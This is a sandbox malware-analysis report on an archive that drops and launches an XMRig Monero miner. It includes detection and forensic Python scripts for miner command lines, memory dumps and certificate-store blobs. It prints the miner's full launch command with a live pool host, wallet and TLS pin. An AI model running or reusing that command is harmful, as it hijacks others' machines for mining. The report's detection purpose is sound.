Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 14:46
Signatures
Unsigned PE
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4652 wrote to memory of 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4652 wrote to memory of 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
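The command line above carries every network IOC of this sample: the pool (pool.hashvault.pro:80), the Monero wallet passed as --user, and a pinned pool certificate fingerprint. The pin matters operationally: the miner will refuse any TLS-inspecting proxy, and because TLS is forced on port 80 the stream is not HTTP, so port-based allow lists and HTTP-only inspection see nothing useful. The SeLockMemoryPrivilege requests logged for xmrig.exe are the privilege XMRig needs for huge pages and make a good co-indicator. The script below is an added example for this report, not sandbox or XMRig code; it parses XMRig-style command lines from process-creation telemetry and returns a verdict plus the extracted IOCs. The first sample line is the command line recorded above, the curl line is constructed, and the miner-name list and the two-reason threshold are assumptions to tune.

```python
"""Flag cryptominer launches in process-creation telemetry and extract IOCs.

Added example for this report, not sandbox or XMRig code. SAMPLE_XMRIG is the
command line recorded by the sandbox above; SAMPLE_CURL is constructed.
"""
import re
import shlex

# Long/short spellings XMRig accepts for the fields worth extracting
# (other CPU miners use the same names).
_VALUE_OPTS = {
    "--url": "pool", "-o": "pool",
    "--user": "wallet", "-u": "wallet",
    "--pass": "password", "-p": "password",
    "--tls-fingerprint": "tls_fingerprint",
    "--donate-level": "donate_level",
    "--algo": "algo", "-a": "algo",
}
_BOOL_OPTS = {"--tls": "tls", "--background": "background", "-B": "background"}

# Standard Monero address: 95 base58 chars (no 0, O, I, l) starting with 4 or 8.
_XMR_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# "host:port", optionally with a stratum scheme, as miners pass pools.
_POOL = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?[\w.-]+:(\d{1,5})$")
# Assumption: binary names worth flagging on sight; extend for your estate.
_MINER_NAMES = re.compile(r"\b(xmrig|xmr-stak|minerd|cpuminer|t-rex|nbminer)\b", re.I)


def parse_miner_args(cmdline: str) -> dict:
    """Turn a miner command line into a dict of the options we care about."""
    out = {"tls": False, "background": False}
    try:
        # posix=False keeps Windows backslashes and quoted paths intact
        argv = shlex.split(cmdline, posix=False)
    except ValueError:                      # unbalanced quotes: plain split
        argv = cmdline.split()
    i = 0
    while i < len(argv):
        key, _, inline = argv[i].partition("=")
        if key in _VALUE_OPTS:
            if inline:                      # --url=pool:port form
                out[_VALUE_OPTS[key]] = inline
            elif i + 1 < len(argv):         # --url pool:port form
                out[_VALUE_OPTS[key]] = argv[i + 1]
                i += 1
        elif key in _BOOL_OPTS:
            out[_BOOL_OPTS[key]] = True
        i += 1
    return out


def classify(cmdline: str) -> dict:
    """Return {'is_miner', 'reasons', 'iocs'} for one process-creation command line.

    Two independent reasons are required so tools that merely take
    --url/--user (curl, git) are not flagged on option names alone.
    """
    args = parse_miner_args(cmdline)
    reasons = []
    pool_match = _POOL.match(args.get("pool", ""))
    if _MINER_NAMES.search(cmdline):
        reasons.append("known miner binary name")
    if pool_match:
        reasons.append("host:port pool argument")
    if _XMR_ADDR.match(args.get("wallet", "")):
        reasons.append("Monero address passed as --user")
    if args["tls"] and args.get("tls_fingerprint"):
        reasons.append("pinned pool TLS fingerprint (defeats TLS inspection)")
    if args["tls"] and pool_match and pool_match.group(1) == "80":
        reasons.append("TLS forced on port 80 (stream is not HTTP)")
    iocs = {k: args[k] for k in ("pool", "wallet", "tls_fingerprint") if k in args}
    return {"is_miner": len(reasons) >= 2, "reasons": reasons, "iocs": iocs}


# Command line recorded by the sandbox above (real IOCs from this report).
SAMPLE_XMRIG = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls --tls-fingerprint "
    "420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)
# Constructed benign line: same option names, no miner semantics.
SAMPLE_CURL = "curl.exe --url https://example.test/api --user alice:secret"

if __name__ == "__main__":
    for line in (SAMPLE_XMRIG, SAMPLE_CURL):
        verdict = classify(line)
        print(verdict["is_miner"], verdict["reasons"], verdict["iocs"])
```

Feed it the CommandLine field of Sysmon event 1 or Security event 4688; the returned `iocs` dict is what you block (pool host, fingerprint) and what you pivot on (wallet) across other hosts and sandbox reports.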
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3496-16-0x000002236CED0000-0x000002236CEF0000-memory.dmp
memory/3496-17-0x000002236E6D0000-0x000002236E6F0000-memory.dmp
memory/3496-18-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-19-0x000002236E710000-0x000002236E730000-memory.dmp
memory/3496-20-0x000002236E6F0000-0x000002236E710000-memory.dmp
memory/3496-21-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-22-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-23-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-24-0x000002236E710000-0x000002236E730000-memory.dmp
memory/3496-25-0x000002236E6F0000-0x000002236E710000-memory.dmp
memory/3496-26-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-27-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-28-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-29-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-30-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-31-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-32-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-33-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-34-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-35-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-36-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-37-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-38-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-39-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-40-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-41-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-42-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-43-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-44-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-45-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-46-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-47-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-48-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-49-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-50-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-51-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-52-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-53-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-54-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-55-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-56-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-57-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-58-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-59-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-60-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-61-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-62-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-63-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-64-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-65-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-66-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-67-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-68-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-69-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-70-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-71-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-72-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-73-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-74-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-75-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-76-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-77-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-78-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-79-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-80-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-81-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-82-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-83-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-84-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
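The dump listing above is long but carries little variety: one region of a few MiB dumped again and again, plus a handful of 128 KiB private regions. The script below is an added example for this report, not sandbox code; it parses names of the form memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp, groups them by region and reports size and dump count, so a listing like this collapses to a few lines. The image/heap label is a heuristic on size and address, not something the sandbox states. The sample is the first eleven entries of the listing above.

```python
"""Summarise a sandbox memory-dump listing by region.

Added example for this report, not sandbox code. SAMPLE_LISTING is copied
from the dump listing above (PID 3496, dumps 16-26).
"""
import re

_DUMP = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def summarise_dumps(lines):
    """Group dump names by (pid, start, end); return regions sorted by size, largest first."""
    regions = {}
    for line in lines:
        m = _DUMP.match(line.strip())
        if not m:
            continue                      # headers or unrelated text
        pid, idx = int(m[1]), int(m[2])
        start, end = int(m[3], 16), int(m[4], 16)
        r = regions.setdefault((pid, start, end), {
            "pid": pid, "start": start, "end": end, "size": end - start,
            "count": 0, "first": idx, "last": idx})
        r["count"] += 1
        r["first"] = min(r["first"], idx)
        r["last"] = max(r["last"], idx)
    return sorted(regions.values(), key=lambda r: r["size"], reverse=True)


def describe(region) -> str:
    """One readable line per region; the kind is a heuristic (size and address only)."""
    if region["size"] >= 1 << 20 and region["start"] >= 0x7FF000000000:
        kind = "likely PE image (large, high user-mode address)"
    else:
        kind = "small private region (heap/stack/config)"
    return (f"PID {region['pid']} 0x{region['start']:016X}-0x{region['end']:016X} "
            f"{region['size'] / (1 << 20):.1f} MiB, dumped {region['count']}x "
            f"(dumps {region['first']}-{region['last']}): {kind}")


SAMPLE_LISTING = """\
memory/3496-16-0x000002236CED0000-0x000002236CEF0000-memory.dmp
memory/3496-17-0x000002236E6D0000-0x000002236E6F0000-memory.dmp
memory/3496-18-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-19-0x000002236E710000-0x000002236E730000-memory.dmp
memory/3496-20-0x000002236E6F0000-0x000002236E710000-memory.dmp
memory/3496-21-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-22-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-23-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-24-0x000002236E710000-0x000002236E730000-memory.dmp
memory/3496-25-0x000002236E6F0000-0x000002236E710000-memory.dmp
memory/3496-26-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
""".splitlines()

if __name__ == "__main__":
    for region in summarise_dumps(SAMPLE_LISTING):
        print(describe(region))
```

Run it over the whole listing (behavioral8, 11 and 12 each) and the three runs line up: the same 0xB03000-byte region at a 0x7FF7... address in every run, which is the region to carve if you want the unpacked miner without touching disk.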
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
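"Modifies system certificate store" deserves a second look before it goes in a report as tampering. The key name D1EB23A46D17D68FD92564C2F1F1601764D8E349 is the SHA-1 thumbprint of the certificate, and the Blob hex above contains, in the clear, CN=AAA Certificate Services, O=Comodo CA Limited, friendly name "Sectigo (AAA)" and a 2004-2028 validity: a long-established public root. AuthRoot is the store that Windows' automatic root update populates when a TLS connection (here to github.com and objects.githubusercontent.com) chains to a root not yet cached locally, so on this evidence the write is a side effect of the download, not a rogue root install. Decode the blob rather than trusting the signature name. The script below is an added example for this report, not sandbox code: it parses the registry Blob layout (a run of CryptoAPI properties, each a DWORD property id, a DWORD that is 1 in practice, a DWORD length and the data), extracts the DER certificate from property 0x20, reads the subject with a minimal DER walk, and checks that sha1(certificate) equals both the stored SHA-1 property (0x03) and the key name. The embedded sample is constructed around an unsigned toy certificate with the same subject so it runs offline; `bytes.fromhex()` of the real Blob hex above, with the key name, decodes the actual entry.

```python
"""Decode a Certificates\\<thumbprint>\\Blob registry value and cross-check it.

Added example for this report, not sandbox code. Blob layout: repeated
(DWORD prop_id, DWORD reserved, DWORD length, data). 0x20 holds the DER
certificate, 0x03 its SHA-1, 0x0B the UTF-16LE friendly name. The sample
blob is CONSTRUCTED around a toy certificate with no real key or signature.
"""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 0x03
CERT_FRIENDLY_NAME_PROP_ID = 0x0B
CERT_CERT_PROP_ID = 0x20
OID_CN = b"\x55\x04\x03"   # 2.5.4.3  commonName
OID_O = b"\x55\x04\x0a"    # 2.5.4.10 organizationName
OID_SHA256_RSA = b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b"


def iter_blob_props(blob: bytes):
    """Yield (prop_id, data) for every property in a serialized certificate blob."""
    off = 0
    while off + 12 <= len(blob):
        prop_id, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if off + length > len(blob):
            raise ValueError(f"property 0x{prop_id:x} runs past end of blob")
        yield prop_id, blob[off:off + length]
        off += length
    if off != len(blob):
        raise ValueError("trailing bytes after last property")


def der_tlv(buf: bytes, off: int = 0):
    """Read one DER TLV (single-byte tag) at off; return (tag, value, next_off)."""
    tag, length = buf[off], buf[off + 1]
    off += 2
    if length & 0x80:                     # long form: low bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, buf[off:off + length], off + length


def der_children(value: bytes):
    """Split the body of a SEQUENCE/SET into a list of (tag, value) children."""
    out, off = [], 0
    while off < len(value):
        tag, val, off = der_tlv(value, off)
        out.append((tag, val))
    return out


def name_attrs(name_der: bytes) -> dict:
    """Flatten an X.501 Name (SEQUENCE OF SET OF {oid, value}) into {oid_bytes: str}."""
    attrs = {}
    for _, rdn in der_children(name_der):
        for _, atv in der_children(rdn):
            (_, oid), (_, val) = der_children(atv)
            attrs[oid] = val.decode("utf-8", "replace")
    return attrs


def cert_subject(cert_der: bytes) -> dict:
    """Return the subject CN and O of a DER certificate without a crypto library."""
    _, cert, _ = der_tlv(cert_der)                      # Certificate ::= SEQUENCE
    fields = der_children(der_children(cert)[0][1])     # tbsCertificate fields
    if fields[0][0] == 0xA0:                            # optional [0] EXPLICIT version
        fields = fields[1:]
    # fields: serial, signature alg, issuer, validity, subject, spki, ...
    subject = name_attrs(fields[4][1])
    return {"CN": subject.get(OID_CN), "O": subject.get(OID_O)}


def parse_cert_blob(key_name: str, blob: bytes) -> dict:
    """Decode a Blob; 'consistent' is True only if key name == stored SHA-1 == sha1(cert)."""
    props = dict(iter_blob_props(blob))
    cert = props[CERT_CERT_PROP_ID]
    computed = hashlib.sha1(cert).hexdigest()
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex()
    friendly = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\x00")
    return {"friendly_name": friendly, "subject": cert_subject(cert), "sha1": computed,
            "consistent": computed == stored == key_name.lower(), "prop_ids": sorted(props)}


# ---- constructed sample (toy certificate, no real key or signature) ----------
def _tlv(tag: int, body: bytes) -> bytes:
    """Tiny DER encoder (lengths < 64 KiB), used only to build the sample."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    if n < 0x100:
        return bytes([tag, 0x81, n]) + body
    return bytes([tag, 0x82]) + n.to_bytes(2, "big") + body


def _name(cn: str, o: str) -> bytes:
    def atv(oid, text):
        return _tlv(0x31, _tlv(0x30, _tlv(0x06, oid) + _tlv(0x0C, text.encode())))
    return _tlv(0x30, atv(OID_O, o) + atv(OID_CN, cn))


def build_sample_blob() -> tuple:
    """Constructed Blob with the subject and friendly name seen in the report's entry."""
    alg = _tlv(0x30, _tlv(0x06, OID_SHA256_RSA) + _tlv(0x05, b""))
    name = _name("AAA Certificate Services", "Comodo CA Limited")
    tbs = _tlv(0x30, _tlv(0xA0, _tlv(0x02, b"\x02")) + _tlv(0x02, b"\x01") + alg
               + name                                                   # issuer == subject
               + _tlv(0x30, _tlv(0x17, b"040101000000Z") + _tlv(0x17, b"281231235959Z"))
               + name
               + _tlv(0x30, alg + _tlv(0x03, b"\x00" * 17)))            # placeholder SPKI
    cert = _tlv(0x30, tbs + alg + _tlv(0x03, b"\x00" * 33))            # placeholder signature
    sha1 = hashlib.sha1(cert).digest()

    def prop(pid, data):
        return struct.pack("<III", pid, 1, len(data)) + data

    blob = (prop(CERT_SHA1_HASH_PROP_ID, sha1)
            + prop(CERT_FRIENDLY_NAME_PROP_ID, "Sectigo (AAA)\x00".encode("utf-16-le"))
            + prop(CERT_CERT_PROP_ID, cert))
    return sha1.hex().upper(), blob


if __name__ == "__main__":
    key, blob = build_sample_blob()
    print(key, parse_cert_blob(key, blob))
```

A `consistent` result plus a subject you recognise as a public root is the auto-update case; a thumbprint that does not match the key name, or a subject nobody has heard of, is when this signature earns its name and the write should be treated as trust-store tampering.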
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1084 wrote to memory of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1084 wrote to memory of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
